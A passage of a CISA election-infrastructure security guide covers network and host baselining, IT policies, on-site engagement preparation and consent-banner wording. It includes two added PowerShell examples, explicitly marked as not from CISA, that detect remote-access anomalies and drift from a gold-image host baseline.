  • If possible, use a local administration password solution. (See Local Administrator Password Solution.)

Establish a Baseline for Host and Network Activity

An organization’s IT personnel are critical in determining what is and is not normal and expected host or network activity. With the appropriate tools, IT personnel are well positioned to determine whether observed anomalous activity warrants further investigation. During on-site engagements, CISA uses the following metrics to establish a baseline for expected network- and host-based activity:

Network Baseline

  • Specific metrics should include expected bandwidth usage for
    • The organization,
    • Each user (if possible),
    • Remote access,
    • Ports,
    • Protocols, and
    • File types.
  • Organizations should consider variables such as the time of day at which traffic occurs; e.g., remote access occurring at 1 a.m. is more suspicious than remote access during standard business hours.
  • Including additional metrics—such as the destination of network traffic and the destination Internet Protocol (IP) address’s geographic location—establishes a more detailed baseline.
  • Once a baseline is established, an organization should review the results to determine if they align with industry best practices. (See Handbook for Elections Infrastructure Security.)
  • Organizations should compare their baseline traffic with the rules from their boundary firewalls to ensure that the rules are acting as intended and align with industry best practices.
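The network baseline checks above (expected users, time of day, destination or source geography, and bandwidth) applied to a few constructed remote access log lines, as an added example that is not part of the CISA document. The log format, user names, addresses and baseline values are all invented for the illustration.

```powershell
# Added example (not from the CISA document): flag remote access events that fall
# outside an agreed baseline. All sample data and baseline values are constructed.

# Baseline agreed with IT staff (assumed values).
$Baseline = @{
    BusinessHours      = 7..18               # 07:00 to 18:59 local time
    ApprovedUsers      = @('jdoe', 'asmith')
    ApprovedCountries  = @('US')
    MaxBytesPerSession = 10MB                # expected per-session transfer volume
}

# Constructed sample lines: "<timestamp> user=<name> src=<ip> country=<cc> bytes=<n>"
$SampleLog = @'
2024-03-04T09:15:02 user=jdoe src=203.0.113.10 country=US bytes=120000
2024-03-04T01:05:41 user=asmith src=203.0.113.22 country=US bytes=8000
2024-03-04T10:30:00 user=svc_backup src=198.51.100.5 country=US bytes=500
2024-03-04T11:02:13 user=jdoe src=192.0.2.77 country=RO bytes=45000000
'@

function ConvertFrom-RemoteAccessLog {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line -match '^(?<ts>\S+) user=(?<user>\S+) src=(?<src>\S+) country=(?<cc>\S+) bytes=(?<bytes>\d+)$') {
            [pscustomobject]@{
                Time    = [datetime]::ParseExact($Matches.ts, "yyyy-MM-dd'T'HH:mm:ss", $null)
                User    = $Matches.user
                Source  = $Matches.src
                Country = $Matches.cc
                Bytes   = [long]$Matches.bytes
            }
        }
    }
}

function Find-RemoteAccessAnomaly {
    param([object[]]$Events, [hashtable]$Baseline)
    # Emits one record per event that violates any baseline rule, with every reason listed.
    foreach ($e in $Events) {
        $reasons = @()
        if ($e.Time.Hour -notin $Baseline.BusinessHours)   { $reasons += 'outside business hours' }
        if ($e.User -notin $Baseline.ApprovedUsers)         { $reasons += 'user not approved for remote access' }
        if ($e.Country -notin $Baseline.ApprovedCountries)  { $reasons += "unexpected source country $($e.Country)" }
        if ($e.Bytes -gt $Baseline.MaxBytesPerSession)      { $reasons += "transfer of $($e.Bytes) bytes exceeds baseline" }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ Time = $e.Time; User = $e.User; Source = $e.Source; Reasons = ($reasons -join '; ') }
        }
    }
}

$events = ConvertFrom-RemoteAccessLog -Lines ($SampleLog -split '\r?\n')
Find-RemoteAccessAnomaly -Events $events -Baseline $Baseline | Format-Table -AutoSize
```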

Host Baseline

  • Organizations can establish a baseline by creating a “gold image” for workstations and servers. A gold image contains an organization’s standard set of necessary, trusted applications installed for the set of systems for which it is designed. Once created, the organization should document the gold image’s configuration. Organizations should also document approved variations from the gold image, such as tools used by the organization’s network or security teams. Examples of configuration information that may be useful in identifying anomalous activity include
    • Hashes of critical operating system files;
    • Software used for remote host access (e.g., a Virtual Private Network client);
    • An organization-wide approved software list, which can help determine if detected software is not approved for the organization; and
    • Information on configurations and settings that can be used to automatically launch software after a reboot, including services, scheduled tasks, and autorun programs.
  • In addition to reviewing files on a system, organizations should review the location of file installation and the validity of the files’ digital certificate, if possible.
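A host baseline built from the configuration items listed above (critical file hashes, automatic services, scheduled tasks and Run keys), recorded on the gold image and later compared against a deployed host, as an added example that is not part of the CISA document. The file list and the baseline path are assumptions to be extended to match the organization's own image.

```powershell
# Added example (not from the CISA document): record a gold-image baseline of critical
# file hashes and autostart entries, then report drift on a deployed host.
# The file list and C:\baseline\gold.json are assumptions.

$CriticalFiles = @(
    "$env:SystemRoot\System32\ntoskrnl.exe",
    "$env:SystemRoot\System32\lsass.exe",
    "$env:SystemRoot\System32\services.exe",
    "$env:SystemRoot\System32\drivers\etc\hosts"
)
$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

function Get-HostBaseline {
    # Collects SHA-256 hashes plus services, tasks and Run-key entries that start automatically.
    $files = foreach ($f in $CriticalFiles) {
        if (Test-Path $f) { @{ Path = $f; Sha256 = (Get-FileHash -Algorithm SHA256 $f).Hash } }
    }
    $services = Get-CimInstance Win32_Service | Where-Object StartMode -eq 'Auto' |
        ForEach-Object { @{ Name = $_.Name; Command = $_.PathName } }
    $tasks = Get-ScheduledTask | Where-Object State -ne 'Disabled' |
        ForEach-Object { @{ Name = "$($_.TaskPath)$($_.TaskName)"; Command = (($_.Actions | ForEach-Object Execute) -join ' ') } }
    $run = foreach ($k in $RunKeys) {
        if (Test-Path $k) {
            (Get-Item $k).Property | ForEach-Object { @{ Name = "$k\$_"; Command = (Get-ItemProperty $k).$_ } }
        }
    }
    @{ Files = @($files); Services = @($services); Tasks = @($tasks); Run = @($run) }
}

function Compare-HostBaseline {
    param($Gold, $Current)
    # Reports changed or unknown critical files and autostart entries absent from the gold image.
    foreach ($f in $Current.Files) {
        $g = $Gold.Files | Where-Object { $_.Path -eq $f.Path }
        if (-not $g)                     { [pscustomobject]@{ Kind = 'File'; Item = $f.Path; Finding = 'not in baseline' } }
        elseif ($g.Sha256 -ne $f.Sha256) { [pscustomobject]@{ Kind = 'File'; Item = $f.Path; Finding = 'hash changed' } }
    }
    foreach ($kind in 'Services', 'Tasks', 'Run') {
        $known = @($Gold.$kind | ForEach-Object Name)
        foreach ($entry in $Current.$kind) {
            if ($entry.Name -notin $known) {
                [pscustomobject]@{ Kind = $kind; Item = $entry.Name; Finding = "new autostart entry: $($entry.Command)" }
            }
        }
    }
}

# On the gold image, once:  Get-HostBaseline | ConvertTo-Json -Depth 4 | Set-Content C:\baseline\gold.json
# On a deployed host:
$gold = Get-Content 'C:\baseline\gold.json' -Raw | ConvertFrom-Json
Compare-HostBaseline -Gold $gold -Current (Get-HostBaseline) | Format-Table -AutoSize
```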

Organization-Wide IT Guidance and Policies

Developing and maintaining guidance and policies targeted to specific situations and that assist in implementing best practices throughout the organization benefits an organization’s IT ecosystem. Guidance and policies that can significantly benefit an organization’s cyber hygiene include

  • A cybersecurity incident response plan and corresponding communications plan (see Incident Handling Overview for Election Officials, Handbook for Elections Infrastructure Security, and Election Cyber Incident Communications Plan Template);
    • At a minimum, include
      • Roles and responsibilities of the parties in regard to the plans;
      • 24/7 contact information for the parties with critical roles;
      • Incident severity thresholds and associated role-based actions taken at those thresholds;
      • A policy establishing a user’s responsibility to notify IT personnel of an IT security event; and
      • Guidance that helps determine when the organization should notify external parties, such as CISA, the Federal Bureau of Investigation, or the Election Infrastructure Information Sharing and Analysis Center (EI-ISAC) (see Election Infrastructure Subsector Communications Protocol, EI-ISAC Formalized Notification Process, both available from CISA upon request, and Cyber Incident Reporting Unified Message).
  • Patch management policies;
  • Password management policies; and
  • An approved software list.

Guidance and policies like these help formalize expectations for users and IT personnel. Organizations should formally document any exceptions to official guidance and policies.

CISA On-Site Engagement Preparation

CISA provides expert intrusion analysis and mitigation guidance to clients who lack in-house capability or require additional assistance with responding to a cyber incident. CISA supports federal departments and agencies, state and local governments, the private sector (industry and critical infrastructure asset owners and operators), academia, and international organizations.

Before CISA can approve an organization’s Request for Technical Assistance (RTA) to provide on-network assistance to SLTT government agencies as part of a hunt or incident response, CISA requires proof that the organization has implemented login consent banners that appear on the screens of all servers and workstations accessed by the organization’s staff and within the scope of the assistance. This login consent banner cannot conflict with other IT resource policies, procedures, or trainings. In many situations, CISA has successfully helped government organizations update their banners in a way that allows CISA assistance. CISA cannot approve deployment to an on-site SLTT engagement involving on-network assistance unless the RTA and login consent banners are approved. For more information regarding consent banners, see the Election Infrastructure Questionnaire.

CISA also strongly recommends that organizations maintain current internal documentation related to the Election Infrastructure Questionnaire. CISA developed the questionnaire to assist organizational documentation of election infrastructure cybersecurity posture and to identify key interdependencies.

Notice and Consent Banners for Computer Systems

This section identifies recommended elements in computing system notice and consent banners and provides an example banner. This section does not include legal advice, and the information it contains is not guaranteed to be accurate or complete. Anyone reviewing or developing a notice and consent banner should consider consulting an attorney and should note that laws can change rapidly, differ from jurisdiction to jurisdiction, and can be subject to various interpretations by various entities. Further, notice and consent banners can require tailoring based on the specific circumstances and legal jurisdiction at issue. The elements or the examples may be inadvisable depending on the entity or situation. Applicable laws may include the Fourth Amendment to the U.S. Constitution, any similar provisions in State Constitutions, and relevant federal- and state-level statutes.

Notice and Consent Banner Elements

  1. The banner expressly covers monitoring of data and communications in transit rather than just accessing data at rest.
    • Example: “You consent to the unrestricted monitoring, interception, recording, and searching of all communications and data transiting, traveling to or from, or stored on this system.”
  2. The banner provides that information in transit or stored on the system may be disclosed to any entity, including to government entities.
    • Example: “You consent, without restriction, to all communications and data transiting, traveling to or from, or stored on this system being disclosed to any entity, including to government entities.”
  3. The banner states that monitoring will be for any purpose.
    • Example: “…at any time and for any purpose.”
  4. The banner states that monitoring may be done by the entity or any person or entity authorized by the entity.
    • Example: “…monitoring or disclosure to any entity authorized by [ENTITY].”
  5. The banner explains to users that they have “no reasonable expectation of privacy” regarding communications or data in transit or stored on the system.
    • Example: “You are acknowledging that you have no reasonable expectation of privacy regarding your use of this system.”
  6. The banner clarifies that the given consent covers personal use of the system (such as personal emails or websites, or use on breaks or after hours) as well as official or work-related use.
    • Example: “…including work-related use and personal use without exception….”
  7. The banner is definitive about the fact of monitoring, rather than being conditional or speculative.
    • Example: “…will be monitored…”
  8. The banner expressly obtains consent from the user and does not merely provide notification.
    • Note: click-through banners can be best because they force the user to interact with the language.
    • Note: supporting processes should generally also preserve/provide evidence of the user’s agreement to the terms.
    • Example: “By using this system, you are acknowledging and consenting to…”
    • Example: “By clicking [ACCEPT] below…you consent to…”
  9. Nothing in the remainder of the banner or associated policies, agreements, training, etc., is inconsistent with, or otherwise undercuts, the elements of the banner.

Example Banner

By clicking [ACCEPT] below you acknowledge and consent to the following:

All communications and data transiting, traveling to or from, or stored on this system will be monitored. You consent to the unrestricted monitoring, interception, recording, and searching of all communications and data transiting, traveling to or from, or stored on this system at any time and for any purpose by [the ENTITY] and by any person or entity, including government entities, authorized by [the ENTITY]. You also consent to the unrestricted disclosure of all communications and data transiting, traveling to or from, or stored on this system at any time and for any purpose to any person or entity, including government entities, authorized by [the ENTITY]. You are acknowledging that you have no reasonable expectation of privacy regarding your use of this system. These acknowledgments and consents cover all use of the system, including work-related use and personal use without exception.

Additional Resources

Elections-Specific Guidance

CISA Election Security Information:
https://www.dhs.gov/cisa/election-security

Incident Handling for Elections:
https://www.dhs.gov/sites/default/files/publications/Incident%20Handling%20Elections%20Final%20508.pdf

Election Cyber Incident Communications Plan Template for State and Local Officials:
https://www.belfercenter.org/publication/election-cyber-incident-communications-plan-template

Election Infrastructure Questionnaire:
https://www.us-cert.gov/sites/default/files/publications/Elections%20Infrastructure%20Questionnaire.pdf

Securing Voter Registration Data:
https://www.us-cert.gov/ncas/tips/ST16-001

Center for Internet Security (CIS) Handbook for Elections Infrastructure Security:
https://www.cisecurity.org/elections-resources-best-practices/

Patch Management Best Practices

Understanding Patches and Software Updates:
https://www.us-cert.gov/ncas/tips/ST04-006

National Institute of Standards and Technology (NIST) Special Publication (SP) 800-40 Rev. 3: Guide to Enterprise Patch Management Technologies:
https://csrc.nist.gov/publications/detail/sp/800-40/rev-3/final

CIS Top 20 Security Controls:
https://www.cisecurity.org/controls/

Ransomware Best Practices

Protecting Against Ransomware:
https://www.us-cert.gov/ncas/tips/ST19-001

Password Best Practices

Choosing and Protecting Passwords:
https://www.us-cert.gov/ncas/tips/ST04-002

Supplementing Passwords:
https://www.us-cert.gov/ncas/tips/ST05-012

NIST SP 800-63B Digital Identity Guidelines Authentication and Lifecycle Management:
https://pages.nist.gov/800-63-3/sp800-63b.html

Enterprise Best Practices

Securing Enterprise Wireless Networks:
https://www.us-cert.gov/ncas/tips/ST18-247

Website Security:
https://www.us-cert.gov/ncas/tips/ST18-006

Note: due to variances among enterprise networks and associated election infrastructure, organizations should not consider these best practices a prescriptive solution for all cybersecurity risks.
